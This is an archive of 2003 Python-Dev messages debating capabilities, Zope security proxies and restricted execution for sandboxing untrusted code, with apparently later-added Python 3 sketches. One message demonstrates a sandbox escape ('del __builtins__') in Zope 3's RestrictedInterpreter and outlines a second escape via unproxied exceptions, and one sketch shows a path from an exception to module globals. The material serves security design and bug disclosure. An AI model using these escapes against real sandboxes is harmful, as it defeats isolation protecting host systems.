In-Reply-To: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz> <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6C70C2.2010104@algroup.co.uk>

Guido van Rossum wrote:
>>Maybe every Python object should have a flag which
>>can be set to prevent introspection -- like the current
>>restricted execution mechanism, but on a per-object
>>basis. Then any object could be used as a capability.
> 
> 
> I think the capability folks would object to calling it a capability
> though. :-)

No, objects are another way to do it, though it seems to me with 
somewhat less ease - because the most common use of capabilities is to 
restrict the type of access to objects other objects have, so you'd need 
to have multiple objects proxying to the "real" one if you do it at the 
object level.

If we were going to go this route, I'd like the alternative of _also_ 
being able to set the flag on a bound method.

> Two questions:
> 
> - Where to store the flag?  It probably would cost 4 bytes per object.

You can swap space for time by storing it as an attribute, of course.

> - Which attributes are considered introspective?

All of them, except methods.

Of course, this is what my first approximation to capabilities did 
(that's what a "capclass" was).

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From ping@zesty.ca  Mon Mar 10 11:14:24 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 10 Mar 2003 05:14:24 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303100010.h2A0ApY06031@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.LNX.4.33.0303100456450.26966-100000@server1.lfw.org>

On Sun, 9 Mar 2003, Guido van Rossum wrote:
> - Which attributes are considered introspective?

Here's a preliminary description of the boundary between "introspective"
and "restricted", off the top of my head:

    1.  The only thing you can do with a bound method is to call it
        (bound methods have no attributes except __doc__).

    2.  The following instance attributes are off limits:
        __class__, __dict__, __module__.

That might be a reasonable start.
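
The two rules above can be written down as a checked attribute lookup. This is
only a sketch of the boundary, assuming a hypothetical restricted_getattr that
an interpreter would apply to every attribute access in restricted code; plain
Python offers no such hook, and the sketch covers only the attributes named in
the list.

```python
import types

# Rule 2: instance attributes that are off limits.
OFF_LIMITS = frozenset({"__class__", "__dict__", "__module__"})

# Rule 1: the only attribute a bound method exposes.
METHOD_ALLOWED = frozenset({"__doc__"})


def restricted_getattr(obj, name):
    """Look up obj.name, refusing the introspective attributes listed above."""
    if isinstance(obj, types.MethodType):
        if name not in METHOD_ALLOWED:
            raise AttributeError(f"bound methods do not expose {name!r}")
    elif name in OFF_LIMITS:
        raise AttributeError(f"{name!r} is off limits in restricted code")
    return getattr(obj, name)
```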

However, there is still the problem that the established technique
for storing instance-specific state in Python is to use globally-
accessible data attributes instead of a limited scope.  We would
also need to add a safe (private) place for instances to put state.


-- ?!ng


From jim@ZOPE.COM  Mon Mar 10 11:26:35 2003
From: jim@ZOPE.COM (Jim Fulton)
Date: Mon, 10 Mar 2003 06:26:35 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico>
Message-ID: <3E6C766B.80400@zope.com>

Samuele Pedroni wrote:
> From: "Jim Fulton" <jim@zope.com>
> 
>>For example, you can't proxy exceptions without
>>breaking exception handling. In Zope, we rely on restricted execution to
>>prevent certain kinds of introspection on exceptions and exception classes.
>>In Zope, we also don't proxy None, because None is usually checked for
>>identity. We also don't proxy strings, and numbers.
>>
> 
> That was a question I was asking myself about proxies: exception handling.
> But I never had the time to play with it to check.
> 
> Does that mean that restricted code can get unproxied instances of classic
> classes as caught exceptions?

Right. What we can (and will do) is intercept the exceptions and proxy the
exception's instance data. So we'll be relying on restricted execution
to protect the exception method meta data and on proxies to protect the
exception data. Of course, we'd prefer to be able to proxy the
exception instances themselves.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 11:31:16 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 06:31:16 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain> <3E635BD3.9000107@algroup.co.uk> <1046981657.15348.80.camel@slothrop.zope.com> <3E68AAF4.3060508@algroup.co.uk> <3E6B258B.2080207@zope.com> <200303091203.h29C3Iu04731@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6C7784.5060103@zope.com>

Guido van Rossum wrote:
> [Jim]
> 
>>You don't need restricted execution to make proxies work.
> 
> 
> Um, I think that's a dangerous mistake, or a confusion in terminology.

All I'm saying is that the proxy mechanism itself doesn't rely on
restricted execution.

> Without restricted execution, untrusted code would have access to
> sys.modules, and from there it would be able to access
> removeAllProxies.

All we need to be able to do is control imports.  It turns out that
to prevent access to sys.modules, we have to replace __builtins__,
which has the side-effect of enabling restricted execution. You
don't need anything but the ability to restrict imports and other
unproxied access to sys.modules to use proxies.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 11:51:22 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 06:51:22 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <05a701c2e66f$6c001be0$6d94fea9@newmexico>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico>
Message-ID: <3E6C7C3A.2090104@zope.com>

Samuele Pedroni wrote:
> From: "Samuele Pedroni" <pedronis@bluewin.ch>
> 
>>From: "Jim Fulton" <jim@zope.com>
>>
>>>For example, you can't proxy exceptions without
>>>breaking exception handling. In Zope, we rely on restricted execution to
>>>prevent certain kinds of introspection on exceptions and exception classes.
>>>In Zope, we also don't proxy None, because None is usually checked for
>>>identity. We also don't proxy strings, and numbers.
>>>
>>
>>That was a question I was asking myself about proxies: exception handling.
>>But I never had the time to play with it to check.
>>
>>Does that mean that restricted code can get unproxied instances of classic
>>classes as caught exceptions?
> 
> 
> maybe the question was unclear,

I think it was clear.

> but it was serious, what I was asking is
> whether some restricted code can do:
> 
> try:
>   deliberate code to force exception
> except Exception,e:
>  ...
> 
> so that e is caught unproxied.

Right. e is caught unproxied.


> Looking at zope/security/_proxy.c it seems this
> can be the case...

Yes,

> then to be (likely) on the safe side, all exception class definitions for
> possible e classes: like e.g.
> 
> class MyExc(Exception):
>     ...
> 
> 
> ought to be executed _in restricted mode_, or be "trivial/empty": something
> like
> 
> class MyExc(Exception):
>     def __init__(self, msg):
>         self.message = msg
>         Exception.__init__(self, msg)
> 
>     def __str__(self):
>         return self.message
>
> is already too much rope.

I'm not sure if you are saying that this example is "trivial/empty"
or not.  It seems that you are saying that it is not trivial enough.
If so, why?


> Although it seems not to have the "nice" two-level-of-calls behavior of Bastion
> instances, an unproxied instance of MyExc if MyExc was defined outside of
> restricted execution, can be used to break out of restricted execution.

How can it be used to break out of restricted execution?

I see three risks:

   1. The exception provides methods to do harmful things,
      such as create side effects or provide access to data outside
      the exception.

   2. The exception creates data that needs to be protected.  For example
      Zope uses a NotFoundError exception that contains an object being searched.

   3. The exception methods' meta data provides access to module globals.

Risk 1 needs to be mitigated through proper exception design. Exceptions
need to be limited in what their methods do.  This is a bit brittle, but
all standard exceptions have this property.

Risk 2 is mitigated by proxying exception instance data.  Proxies can do this.
This is what we've decided to do, although we haven't implemented it yet.

Risk 3 is mitigated by restricted execution.
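
As one reading of Risk 3, the sketch below shows the path from a caught,
unproxied exception instance to the globals of the module that defined its
class. It is written for unrestricted Python 3, where the attributes are
spelled __func__ and __globals__ (im_func and func_globals at the time of this
thread), and it assumes a stand-in "trusted" module built with exec; SECRET and
reach_globals are hypothetical names. Restricted execution is what blocks
these attribute lookups.

```python
import types

# A stand-in for a trusted module defined outside restricted execution.
TRUSTED_SOURCE = '''
SECRET = "trusted module state"

class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

    def __str__(self):
        return self.message
'''

trusted = types.ModuleType("trusted")
exec(TRUSTED_SOURCE, trusted.__dict__)


def reach_globals(exc):
    """Walk from an exception instance to its defining module's globals."""
    return exc.__str__.__func__.__globals__


try:
    raise trusted.MyExc("boom")
except Exception as caught:
    leaked = reach_globals(caught)   # the trusted module's namespace
```

An exception class with no Python-level methods offers no function object to
start this walk from, which may be the sense in which a class needs to be
"trivial/empty".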

Have I missed anything?

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From jim@zope.com  Mon Mar 10 12:23:08 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 07:23:08 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <3E6C83AC.7070100@zope.com>

Ka-Ping Yee wrote:
> Ben Laurie wrote:
> 
>>BTW, if you would like to explain why you don't think bound methods are
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> Guido van Rossum wrote:
> 
>>Using capabilities, I would have to hand her
>>a bunch of capabilities for various methods: __getitem__, has_key,
>>get, keys, items, values, and many more.  Using proxies I can simply
>>give her a read-only proxy for the object.  So proxies are more
>>powerful.

I'm pretty sure that Guido meant to say "bound method" rather than
"capability" in the text above.  I think that the debate is partly
whether to express capabilities (or some other scheme) in terms of
bound methods or proxies, which expose entire interfaces.

> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.

There are a bunch of confusions floating around. :)
A major one is the lack of a concise definition of what a capability is and
why the capability approach is good or bad.

I've been reading about capabilities in E, http://www.erights.org/.
I really need to read all that stuff again.  Of course,
as others pointed out, I ended up creating something for Zope 3
that isn't capabilities.  I think you touch on a reason below.


> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.
> 
> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?
> 
> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".
> 
> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.
>
> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.
> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

You seem to be arguing that programmers should not have to
explicitly create capabilities, but that everything should be a capability
by default.  Please correct me if I'm wrong.

I thought that the main point of capabilities was that programmers
*should* explicitly bother to pass capabilities.  Programmers should
think about arguments passed to (or returned or raised to) other code as
capabilities to do things and pass *just* the capabilities needed.
I find a lot of appeal in this idea.

Zope employs proxies in a way that falls somewhere between the extremes of
capabilities and implicitly protecting everything.

(I'm going to be a little sloppy here for brevity. A Zope proxy is made up
of two objects, a simple proxy that *could* be used to implement capabilities
and a checker that provides policy. The policy we currently use in Zope is
not a capability policy.)

Zope security proxies ensure that "everything" is proxied. (We choose not
to proxy simple values like numbers, strings, and None.) Values returned
from operations on proxied objects are themselves proxied. This makes it pretty
straightforward to set up execution environments where untrusted code only has
access to proxies. In addition, if untrusted code calls trusted code, the
untrusted code can only pass proxies. This means that trusted code can't be
tricked into performing operations that the untrusted code could not perform.
Zope proxies achieve this level of automation by providing registries, mostly
based on classes, that allow programmers to say how different kinds of objects
should be proxied. Programmers decide what capabilities to expose at "compile"
time (really program startup) rather than run time. Programmers *can* explicitly
create proxies that provide non-default access. In fact, there are APIs that
actually provide the equivalent of capabilities.
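
The proxy-plus-checker split described above can be sketched roughly as
follows (Python 3 syntax). This is only an illustration, not Zope's
implementation: Checker, Proxy, CHECKERS, UNPROXIED, proxy_for and Registry
are hypothetical names, and a pure-Python proxy like this one does not
actually hide the wrapped object from determined code.

```python
class Checker:
    """Policy half: the set of attribute names a caller may read."""

    def __init__(self, allowed):
        self.allowed = frozenset(allowed)

    def check(self, name):
        if name not in self.allowed:
            raise AttributeError("access to %r is forbidden" % name)


# Hypothetical class-based registry, filled in once at program startup.
CHECKERS = {}

# Simple values are handed out unproxied.
UNPROXIED = (int, float, str, bytes, type(None))


def proxy_for(value):
    """Wrap value in a Proxy unless it is a simple value."""
    if isinstance(value, UNPROXIED):
        return value
    # Classes without a registered checker expose nothing at all.
    return Proxy(value, CHECKERS.get(type(value), Checker(())))


class Proxy:
    """Proxy half: forwards permitted reads and proxies every result."""

    __slots__ = ("_obj", "_checker")

    def __init__(self, obj, checker):
        object.__setattr__(self, "_obj", obj)
        object.__setattr__(self, "_checker", checker)

    def __getattribute__(self, name):
        obj = object.__getattribute__(self, "_obj")
        object.__getattribute__(self, "_checker").check(name)
        value = getattr(obj, name)
        if callable(value):
            # Results of calls are proxied too.
            return lambda *args, **kw: proxy_for(value(*args, **kw))
        return proxy_for(value)

    def __setattr__(self, name, value):
        raise AttributeError("this sketch allows no writes")


class Registry:
    def __init__(self):
        self.data = {"smtp": ["mail.example.org"]}

    def get(self, key):
        return self.data[key]


CHECKERS[Registry] = Checker({"get"})
CHECKERS[list] = Checker({"index"})

registry = proxy_for(Registry())
hosts = registry.get("smtp")  # a proxied list, not the list itself
```

Here the decision about what each class exposes is made once, in CHECKERS,
and every value that crosses the boundary is wrapped automatically.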

I mention all of this because I think it's worth thinking/debating this issue
about how explicit security should be. On the one hand, explicitly giving *just*
the capabilities needed for a task seems very appealing. OTOH, making sure
that everything is protected by default is safer.  I suspect that there
are ways to combine (trade off?) these in reasonable ways.

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From ben@algroup.co.uk  Mon Mar 10 14:03:28 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 14:03:28 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100452540.26966-100000@server1.lfw.org>
Message-ID: <3E6C9B30.8030901@algroup.co.uk>

Ka-Ping Yee wrote:
> On Sat, 8 Mar 2003, Ben Laurie wrote:
> 
>>>>c) Wrap or replace some of the existing libraries, certify that others
>>>>are "safe"
>>>
>>>This should only be necessary for (core and 3rd party) extension
>>>modules.  The rexec module has a framework for this.
>>>
>>>
>>>>It looks to me like a and b are shared with proxies, and c would be
>>>>different, by definition. Is there anything else? Am I on the wrong track?
>>>
>>>I don't know why you think (c) is different.
>>
>>Because with proxies you'd wrap with proxies, and with capabilities
>>you'd wrap with capabilities. Or do you think there's a way that would
>>work for both (which would, of course, be great)?
> 
> 
> This doesn't make any sense to me.  The standard libraries would provide
> proxy wrappers in either case.  The rexec vs. proxy issue doesn't enter
> into it.

We've got too much overloading here! I meant "proxy" as in "Zope proxy". 
Yes, in either case they'll be wrapped in some kind of (non-Zope) proxy, 
but the actual wrapper would be different.

> By the way -- to avoid confusion between "proxies used to wrap
> unrestricted objects in order to make them into secure objects" and
> "proxies used to reduce the interface of an existing secure object",
> let's call the first "proxy" (as has been used in the "rexec vs. proxy"
> discussion so far), and call the second a "facet" (which is the term
> commonly used when capabilities people talk about reducing an interface).
> We often talk about providing, say, a "read-only facet" on an object.

This would be more applicable to an object-based capability model, which 
Jim and Guido seem to favour.

In fact, perhaps it would be nicest to be able to do both - i.e. bound 
methods _and_ opaque objects.

Then we'd all be happy.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From pedronis@bluewin.ch  Mon Mar 10 14:18:43 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 10 Mar 2003 15:18:43 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com>
Message-ID: <008001c2e70f$f514c520$6d94fea9@newmexico>

From: "Jim Fulton" <jim@zope.com>
> How can it be used to break out of restricted execution?
>
> I see three risks:
>
>    1. The exception provides methods to do harmful things,
>       such as create side effects or provide access to data outside
>       the exception.
>
>    2. The exception creates data that needs to be protected.  For example
>       Zope uses a NotFoundError exception that contains an object being
>       searched.
>
>    3. The exception methods meta data provide access to module globals.
>
> Risk 1 needs to be mitigated through proper exception design. Exceptions
> need to be limited in what their methods do.  This is a bit brittle, but
> all standard exceptions have this property.
>
> Risk 2 is mitigated by proxying exception instance data.  Proxies can do
> this.
> This is what we've decided to do, although we haven't implemented it yet.
>
> Risk 3 is mitigated by restricted execution.
>
> Have I missed anything?

OK, I have had the time to really try what I was thinking about. I have not
found a way to really break out from restricted execution
(does not mean I'm sure there isn't) BUT:

I'm considering:
- Python 2.2.2
- Zope 3 3.0a1 and
  zope.security.interpreter.RestrictedInterpreter
  with zope.security.simplepolicies.ParanoidSecurityPolicy (the default)

so

1. a bug (rexec had it too). If I remember correctly the solution is
re-injecting __builtins__ before each exec

C:\transit\Zope3-3.0a1\src\zope\security>\usr\python22\python
Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path.append('..\..')
>>> from zope.security.interpreter import RestrictedInterpreter
>>> ri=RestrictedInterpreter()
>>> ri.ri_exec("class A: pass")
>>> ri.ri_exec("print A.__dict__")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "..\..\zope\security\interpreter.py", line 32, in ri_exec
    exec code in self.globals
  File "<string>", line 1, in ?
RuntimeError: class.__dict__ not accessible in restricted mode
>>> ri.ri_exec("del __builtins__")
>>> ri.ri_exec("print A.__dict__")
{'__module__': '__builtin__', '__doc__': None}

or be sure to call ri_exec only once on each RestrictedInterpreter instance.
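
The same class of bug can be reproduced with plain exec() in Python 3, and
the re-injection fix sketched next to it. This is an illustration only:
SAFE_BUILTINS and TinyInterpreter are hypothetical names, not Zope code, and
a restricted __builtins__ alone is not a secure sandbox.

```python
SAFE_BUILTINS = {"len": len, "print": print}  # hypothetical whitelist

# Leaky variant: __builtins__ is installed once and then trusted to stay.
leaky = {"__builtins__": dict(SAFE_BUILTINS)}
exec("del __builtins__", leaky)
# exec() puts the full builtins back when the key is missing,
# so the second snippet can see open().
exec("found = open", leaky)


class TinyInterpreter:
    """Re-injects the restricted builtins before every exec."""

    def __init__(self):
        self.globals = {}

    def run(self, source):
        self.globals["__builtins__"] = dict(SAFE_BUILTINS)
        exec(source, self.globals)


fixed = TinyInterpreter()
fixed.run("del __builtins__")
try:
    fixed.run("found = open")
    escaped = True
except NameError:
    escaped = False
```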

Assuming that fixed:

2. If code executed under a RestrictedInterpreter could obtain a MyExc instance
and had a working unproxied/non-proxying 'property' built-in, it could very
likely break out from restricted execution. Fortunately the 'property' passed
to such code is not working. Given that that's not the case I skip the
illustration.

3.  How likely this scenario is really depends on how RestrictedInterpreter
is used, how and where exceptions are defined, whether restricted code can
really manage to get an instance of one of them ... whether further
restrictions, e.g. on subclassing, are added or removed ... whether the general
situation of restricted execution and new-style classes improves. All of this
I don't know.

Here I consider: a "dangerous" function ('sys.exit') is imported in the same
module where MyExc is defined, MyExc is not defined under restricted execution,
a proxied function is passed to restricted code such that it can capture an
instance of MyExc (as I said whether this set of things is likely/unlikely I
don't know):

<s.py>
import sys

from sys import exit # !!! same module as MyExc

sys.path.append('C:/transit/Zope3-3.0a1/src')

from zope.security.interpreter import RestrictedInterpreter
from zope.security.checker import ProxyFactory

class MyExc(Exception): # !!! definition outside of restricted execution
  def __init__(self,msg):
    self.message = msg
    Exception.__init__(self,msg)

  def __str__(self):
    return self.message

def myfunc():
  raise MyExc('foo')

ri = RestrictedInterpreter()

ri.globals['myfunc'] = ProxyFactory(myfunc)

f = open('c:/Documenti/x.txt','r')
code = f.read()
f.close()

ri.ri_exec(code)

print "OK"
</s.py>

Anyway I have a _very baroque_ x.txt that manages to call sys.exit.

regards


From jim@zope.com  Mon Mar 10 15:29:41 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:29:41 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
References: <200303092242.h29MgiJ16667@oma.cosc.canterbury.ac.nz>
Message-ID: <3E6CAF65.4040505@zope.com>

Greg Ewing wrote:
>>E.g. I might have a service configuration registry object.  The object
>>behaves roughly like a dictionary.  A certain user may be given
>>read-only access to the registry.
> 
> 
> Maybe every Python object should have a flag which
> can be set to prevent introspection -- like the current
> restricted execution mechanism, but on a per-object
> basis. Then any object could be used as a capability.

Yes, but not a very useful one.  For example, given a file,
you often want to create a "file read" capability which is
an object that allows reading the file but not writing the file.
Just preventing introspection isn't enough.
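
A "file read" capability of the kind described here might be sketched like
this (Python 3 syntax; make_read_facet and ReadFacet are hypothetical names).
It shows only the reduced interface. In an unrestricted interpreter the
underlying file can still be reached through the methods' closures, which is
the introspection problem the rest of the thread is about.

```python
import io


def make_read_facet(f):
    """Return an object exposing only the reading half of f's interface."""

    class ReadFacet:
        __slots__ = ()  # no instance attributes, so no reference to f here

        def read(self, size=-1):
            return f.read(size)

        def readline(self):
            return f.readline()

    return ReadFacet()


f = io.StringIO("spam\neggs\n")
reader = make_read_facet(f)
first = reader.readline()
```

The holder of reader can read the file but has no write() or truncate() to
call.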

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org


From ben@algroup.co.uk  Mon Mar 10 15:30:13 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 10 Mar 2003 15:30:13 +0000
Subject: [Python-Dev] Capabilities
In-Reply-To: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <3E6CAF85.30300@algroup.co.uk>

Ka-Ping Yee wrote:
> Ben Laurie wrote:
> 
>>BTW, if you would like to explain why you don't think bound methods are
>>the way to go on python-dev, I'd love to hear it.
> 
> 
> Guido van Rossum wrote:
> 
>>Using capabilities, I would have to hand her
>>a bunch of capabilities for various methods: __getitem__, has_key,
>>get, keys, items, values, and many more.  Using proxies I can simply
>>give her a read-only proxy for the object.  So proxies are more
>>powerful.
> 
> 
> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.
> 
> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.

I think this is an implementation detail, as I have mentioned before. A 
capability is a thing with certain properties, as discussed ad nauseam. 
You can implement them using bound methods or using opaque objects. 
Personally, I'd like to do both, but if I had to choose, I'd use bound 
methods.
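
For comparison, the two styles might look like this for a dictionary-like
registry (Python 3 syntax; the registry contents are made up for
illustration). types.MappingProxyType is the standard library's read-only
mapping view and stands in here for an "opaque object".

```python
import types

registry = {"smtp": "mail.example.org"}

# Style 1: one bound method per permitted operation.
lookup = registry.__getitem__
names = registry.keys

# Style 2: a single object that carries the whole read-only interface.
view = types.MappingProxyType(registry)

# Without restricted attributes a bound method leaks its object:
leaked = lookup.__self__

try:
    view["smtp"] = "evil.example.org"
    writable = True
except TypeError:
    writable = False
```

Style 1 needs one reference per method; style 2 hands over one reference.
Either way, the unrestricted interpreter still lets the holder of lookup get
back to the dictionary through __self__.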

Yes, this probably is a shift in position - I'm still trying to figure 
this stuff out, is my excuse!

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Mon Mar 10 15:38:28 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 10 Mar 2003 10:38:28 -0500
Subject: [Python-Dev] Capabilities
In-Reply-To: Your message of "Mon, 10 Mar 2003 04:51:40 CST."
 <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
References: <Pine.LNX.4.33.0303100436220.26966-100000@server1.lfw.org>
Message-ID: <200303101538.h2AFcTR12087@odiug.zope.com>

> Ben Laurie wrote:
> > BTW, if you would like to explain why you don't think bound methods are
> > the way to go on python-dev, I'd love to hear it.
> 
> Guido van Rossum wrote:
> > Using capabilities, I would have to hand her
> > a bunch of capabilities for various methods: __getitem__, has_key,
> > get, keys, items, values, and many more.  Using proxies I can simply
> > give her a read-only proxy for the object.  So proxies are more
> > powerful.

(Jim surmised that I meant to write "bound methods".  Alas, I don't
get off that easily: at the time I wrote that I really did think that
a capability had to be a single function.)

[Ping]
> There seems to be a persistent confusion here that i would like
> to dispel: a capability is not a single lambda.

I guess I misunderstood.  I was sure that Ben told me this was so.
Apparently I misread, or you have a different definition of capability
than he does (wouldn't be the first time.)

> Guido's paragraph, above, seems to believe that it is.  In fact,
> the pattern he described is a common and powerful way of using
> capabilities.  A capability is just an unforgeable object reference.
> In a pure capability system, the only thing you can do with a
> capability is to call methods on it (or, if you prefer, all you
> can do is send messages to it).  Interposing an object to expose
> only a subset of another object's API, such as a read-only subset,
> is exactly the power capabilities give you.

So a proxy with a fixed (not depending on the caller) policy about
which methods you can call should be considered as equivalent to a
capability -- in fact this would be a way to implement capabilities.

> It seems to me that the "rexec vs. proxy" debate is really about
> a very different question: How do we get from Python's currently
> promiscuous objects to properly restricted objects?
> 
> (Once we have properly restricted objects in either fashion, yes,
> definitely, using proxies to restrict access is a great technique.)
> 
> If i understand correctly, the "proxy" answer is "we create a
> special wrapper object, then the programmer has to individually
> wrap any object they want to be secure".  And the "rexec" answer
> is "we create an interpreter mode in which all objects are secure".

Well, actually, restricted execution as currently implemented does
*not* strive to make all objects secure: untrusted code can still
inspect all attributes of an object unless that object is proxied by a
Bastion, or unless that object is one of a few built-in types
(e.g. bound methods) for which some attributes are privatized.

> I think the latter is far better.  To have any sort of real chance
> at establishing security, you have to start from a place where
> everything is secure, instead of starting from a place where
> everything is insecure and you have to individually secure every
> single object with its own wrapper.

But we don't have the latter.

> The eventual ideal is to have a system where all objects are
> "pure" objects (i.e. non-introspectable capabilities) by default.

That wouldn't be Python.

> Anyone wanting to do introspection would simply have to obtain
> the "introspect" capability from a privileged place (e.g. sys).
> For example,
> 
>     class Foo:
>         pass
> 
>     print Foo.__dict__                  # fails
> 
>     from sys import introspect
>     print introspect(Foo).__dict__      # succeeds
> 
> When running the interpreter in secure mode, "introspect"
> would just be missing from the sys module (again, ideally
> sys.introspect wouldn't exist by default, and a command-line
> option would turn it on, but i realize that's far away).
> 
> This would have the effect of the "introspectable flag" that
> Guido mentioned, but without expending any storage at all,
> until you actually needed to introspect something.

That flag wasn't my idea, it was someone else's (Greg Ewing?).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jim@zope.com  Mon Mar 10 15:34:38 2003
From: jim@zope.com (Jim Fulton)
Date: Mon, 10 Mar 2003 10:34:38 -0500
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <1047150320.2347.26.camel@localhost.localdomain>
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain>
Message-ID: <3E6CB08E.4030905@zope.com>

Jeremy Hylton wrote:

...

> I think both techniques achieve the same end, but with different
> limitations.  I prefer the proxy approach because it is more self
> contained.  The rexec approach requires that all developers working in
> the core on introspection features be aware of security issues.  The
> security kernel ends up being most of the core interpreter -- anything
> that can introspection on objects.

